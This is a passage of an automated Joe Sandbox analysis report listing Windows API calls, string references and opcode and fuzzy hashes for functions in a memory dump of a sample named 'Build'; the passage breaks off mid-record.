                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                • API String ID: 3177248105-2084034818
                                                                                                                                                                                • Opcode ID: d810ce0714ffe4401f49f1f225832815d6180d6a3a41be3a2dc3bb3b05491e68
                                                                                                                                                                                • Instruction ID: 8770ea3afea03b90bc350d11f9d61ac81005d279d561b13e22ee250618531b06
                                                                                                                                                                                • Opcode Fuzzy Hash: d810ce0714ffe4401f49f1f225832815d6180d6a3a41be3a2dc3bb3b05491e68
                                                                                                                                                                                • Instruction Fuzzy Hash: 3FE0BF30A80705B7EF111F61EC56F593FA5EB11B51F144060F91DA90F1DFA999A09A84
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,00B4B662,?,?,00000000,?,?), ref: 00B4B161
                                                                                                                                                                                • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,00B4B662,?,?,00000000,?,?), ref: 00B4B179
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,00B4B662,?,?,00000000,?,?), ref: 00B4B1AB
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,00B4B662,?,?,00000000,?,?), ref: 00B4B1CA
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLast$FileHandleRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2244327787-0
                                                                                                                                                                                • Opcode ID: 78fc58781153cfb6c549aa230e2b2526d7d5ef8f25a0739ef584683fb904d77c
                                                                                                                                                                                • Instruction ID: bdf332b956d8d9bbef1205116d705a14adcb3993865da9bdd3a9ad42a8bcf582
                                                                                                                                                                                • Opcode Fuzzy Hash: 78fc58781153cfb6c549aa230e2b2526d7d5ef8f25a0739ef584683fb904d77c
                                                                                                                                                                                • Instruction Fuzzy Hash: D2118230924604EBDF215F20CC64E6937E9FB453A1F1046AAFA16A5290DB70DF84FB51
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00B6688D,00000000,00000000,?,00B6D32B,00B6688D,00000000,00000000,00000000,?,00B6D528,00000006,FlsSetValue), ref: 00B6D3B6
                                                                                                                                                                                • GetLastError.KERNEL32(?,00B6D32B,00B6688D,00000000,00000000,00000000,?,00B6D528,00000006,FlsSetValue,00B7AC00,FlsSetValue,00000000,00000364,?,00B6BA77), ref: 00B6D3C2
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00B6D32B,00B6688D,00000000,00000000,00000000,?,00B6D528,00000006,FlsSetValue,00B7AC00,FlsSetValue,00000000), ref: 00B6D3D0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                                • Opcode ID: c1291cbda7ea9273d340d83c4da9ecda83aaa9111b5449da335b64aec30b0846
                                                                                                                                                                                • Instruction ID: 989e7b89e49229ffb90f577fbe7958cc03c730e3b95a4c57cd087853df0a1361
                                                                                                                                                                                • Opcode Fuzzy Hash: c1291cbda7ea9273d340d83c4da9ecda83aaa9111b5449da335b64aec30b0846
                                                                                                                                                                                • Instruction Fuzzy Hash: BC01F232B51726ABCB214F69AC84A577BD8FF05BA17250664F91ED7380CF28D8408AE5
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B512F6: GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 00B51315
                                                                                                                                                                                  • Part of subcall function 00B512F6: GetProcAddress.KERNEL32(00B8C1F0,CryptUnprotectMemory), ref: 00B51325
                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000200,?,00B51366), ref: 00B513F9
                                                                                                                                                                                Strings
                                                                                                                                                                                • CryptProtectMemory failed, xrefs: 00B513B0
                                                                                                                                                                                • CryptUnprotectMemory failed, xrefs: 00B513F1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$CurrentProcess
                                                                                                                                                                                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                                                                                                                                                • API String ID: 2190909847-396321323
                                                                                                                                                                                • Opcode ID: 50ec9eaa3cd2711bb56916f5d41fc94cc1fef5e4c326933551bd539a2d0d5a13
                                                                                                                                                                                • Instruction ID: 81c146a2e0c6cd9bcc83cafa827fdaad8adb8f16a37727019b62885785e40134
                                                                                                                                                                                • Opcode Fuzzy Hash: 50ec9eaa3cd2711bb56916f5d41fc94cc1fef5e4c326933551bd539a2d0d5a13
                                                                                                                                                                                • Instruction Fuzzy Hash: 33113331600624ABDB15AB289C85B6E3BE8EF00B21B0085E6FC116B262DF309D85CBD4
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00010000,Function_00013240,?,00000000,?), ref: 00B53129
                                                                                                                                                                                • SetThreadPriority.KERNEL32(00000000,00000000), ref: 00B53170
                                                                                                                                                                                  • Part of subcall function 00B47BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B47BD5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Thread$CreatePriority__vswprintf_c_l
                                                                                                                                                                                • String ID: CreateThread failed
                                                                                                                                                                                • API String ID: 2655393344-3849766595
                                                                                                                                                                                • Opcode ID: bc962f8b752967ae287735299e63b056b525d3f90f15000b9d2001a988ed76bc
                                                                                                                                                                                • Instruction ID: 7c81af79f98555962cb6452b8c457c44011225950d2b32098d2d437434c24337
                                                                                                                                                                                • Opcode Fuzzy Hash: bc962f8b752967ae287735299e63b056b525d3f90f15000b9d2001a988ed76bc
                                                                                                                                                                                • Instruction Fuzzy Hash: A701DBB5248B066FD3207F609C81F6677D8EB41B52F1001EEFA456B2D0CEA16945C764
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00B4F306,00000001,?,?,?,00000000,00B57564,?,?,?,?), ref: 00B4B9DE
                                                                                                                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00B4BA25
                                                                                                                                                                                • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00B4F306,00000001,?,?,?), ref: 00B4BA51
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite$Handle
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4209713984-0
                                                                                                                                                                                • Opcode ID: b6467d893b1be5eefcb7ea993bbc86a23c7a0ce639b566f1728f4cbbb27a9485
                                                                                                                                                                                • Instruction ID: 8e7012ab344fb155a2383f876fedb4a4f5e68cf9b21d0cfbfeb707665ebbd287
                                                                                                                                                                                • Opcode Fuzzy Hash: b6467d893b1be5eefcb7ea993bbc86a23c7a0ce639b566f1728f4cbbb27a9485
                                                                                                                                                                                • Instruction Fuzzy Hash: D631BC31248305AFDB14CF24D848F6A77E5EB81715F000A5DFA816B290CF74DE88DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B4E1EC: _wcslen.LIBCMT ref: 00B4E1F2
                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000,00B4BBD0,?,00000001,00000000,?,?), ref: 00B4BF12
                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,00000000,00B4BBD0,?,00000001,00000000,?,?), ref: 00B4BF45
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000,00B4BBD0,?,00000001,00000000,?,?), ref: 00B4BF62
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2260680371-0
                                                                                                                                                                                • Opcode ID: 6eae95561625d436c03c30926270ca04dbe8163fadd573eeec301ac5b649c4da
                                                                                                                                                                                • Instruction ID: 7e1169806a743224c07b451182fd070ecc3bff6964e2ed36f1f260a7f6164575
                                                                                                                                                                                • Opcode Fuzzy Hash: 6eae95561625d436c03c30926270ca04dbe8163fadd573eeec301ac5b649c4da
                                                                                                                                                                                • Instruction Fuzzy Hash: F811A031200214AADF15AB748C45FFE73D8DF09700F0448D4FB09D7191DB68DF8AAA65
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00B6DF08
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Info
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1807457897-3916222277
                                                                                                                                                                                • Opcode ID: 23dbdacd7be92890ecc396ffeabba533b6d7acaa5a4771255fd1ce650e53b43a
                                                                                                                                                                                • Instruction ID: 7773754402b8eaf747124480536055f5845ae41d5ed84495df36bd374db2fe70
                                                                                                                                                                                • Opcode Fuzzy Hash: 23dbdacd7be92890ecc396ffeabba533b6d7acaa5a4771255fd1ce650e53b43a
                                                                                                                                                                                • Instruction Fuzzy Hash: DA412974A043889FDF228F248C85BF6BBEAEF55304F1404ECE59E87142D279AA45CF60
                                                                                                                                                                                APIs
                                                                                                                                                                                • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 00B6D62D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: String
                                                                                                                                                                                • String ID: LCMapStringEx
                                                                                                                                                                                • API String ID: 2568140703-3893581201
                                                                                                                                                                                • Opcode ID: da56e6ca775be881f972a1c1957a5ef3ceda3efeb16fedd034ea726916b1bc14
                                                                                                                                                                                • Instruction ID: a81cf2ddcabeb65eb197a664326f2ce659debcd191c5d2643ed9ef3a9963cb14
                                                                                                                                                                                • Opcode Fuzzy Hash: da56e6ca775be881f972a1c1957a5ef3ceda3efeb16fedd034ea726916b1bc14
                                                                                                                                                                                • Instruction Fuzzy Hash: 36014832A00208BBCF025FA0DD02DEE7FA2EF4C710F018194FE1826171CA768971EB91
                                                                                                                                                                                APIs
                                                                                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00B6CBBF), ref: 00B6D5A5
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                • String ID: InitializeCriticalSectionEx
                                                                                                                                                                                • API String ID: 2593887523-3084827643
                                                                                                                                                                                • Opcode ID: 97e676c9407397726a9ece374dcb99f81523696d9f1f295b2417a088ea690268
                                                                                                                                                                                • Instruction ID: 2cfcf0b82bdca86998d7d44640ee20bc88174a19d47b3b048b92b3a3a3066843
                                                                                                                                                                                • Opcode Fuzzy Hash: 97e676c9407397726a9ece374dcb99f81523696d9f1f295b2417a088ea690268
                                                                                                                                                                                • Instruction Fuzzy Hash: BDF09031A4521CBBCB016F65DD05DAD7BA1DB58711B0081A5FD191A160CE354E109B81
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Alloc
                                                                                                                                                                                • String ID: FlsAlloc
                                                                                                                                                                                • API String ID: 2773662609-671089009
                                                                                                                                                                                • Opcode ID: 845474b68e54afcdad1318563811d09f17739f42fd8b80d0a5840c73412e4845
                                                                                                                                                                                • Instruction ID: b934b1f0828c791c148321804db3acc7911930ae35356b5977b05ab6984a9644
                                                                                                                                                                                • Opcode Fuzzy Hash: 845474b68e54afcdad1318563811d09f17739f42fd8b80d0a5840c73412e4845
                                                                                                                                                                                • Instruction Fuzzy Hash: FEE02B31F41218ABC7046FA59C16D6DBBE5CB88710F4141E9FC1D673A1CD755D40A6C6
                                                                                                                                                                                APIs
                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B610BA
                                                                                                                                                                                  • Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
                                                                                                                                                                                  • Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                • String ID: 3To
                                                                                                                                                                                • API String ID: 1269201914-245939750
                                                                                                                                                                                • Opcode ID: 972ccd526eb93fb0bee9a57842149dbad72d2538bd4c959025ec6f15f805d3d1
                                                                                                                                                                                • Instruction ID: 899a51d793fcf60847aac14cc388e14ec220a367648b9090ef3fa340753c515e
                                                                                                                                                                                • Opcode Fuzzy Hash: 972ccd526eb93fb0bee9a57842149dbad72d2538bd4c959025ec6f15f805d3d1
                                                                                                                                                                                • Instruction Fuzzy Hash: 38B092A23AC102AC2A282159AC028370188C081B20330CAEAF814C008098492C840032
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00B6DE0B: GetOEMCP.KERNEL32(00000000,?,?,00B6E094,?), ref: 00B6DE36
                                                                                                                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00B6E0D9,?,00000000), ref: 00B6E2B4
                                                                                                                                                                                • GetCPInfo.KERNEL32(00000000,00B6E0D9,?,?,?,00B6E0D9,?,00000000), ref: 00B6E2C7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true
                                                                                                                                                                                • Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                • Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_13_2_b40000_Build.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CodeInfoPageValid
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 546120528-0
                                                                                                                                                                                • Opcode ID: 8b3f25a04298d831b779f398631b60cd2d3c382eefe84b994af51a9540bac766
                                                                                                                                                                                • Instruction ID: 1e687980c76d7a19dff8e19b5edd31212c045f7ca56b845ee3aabc7478bdeacb
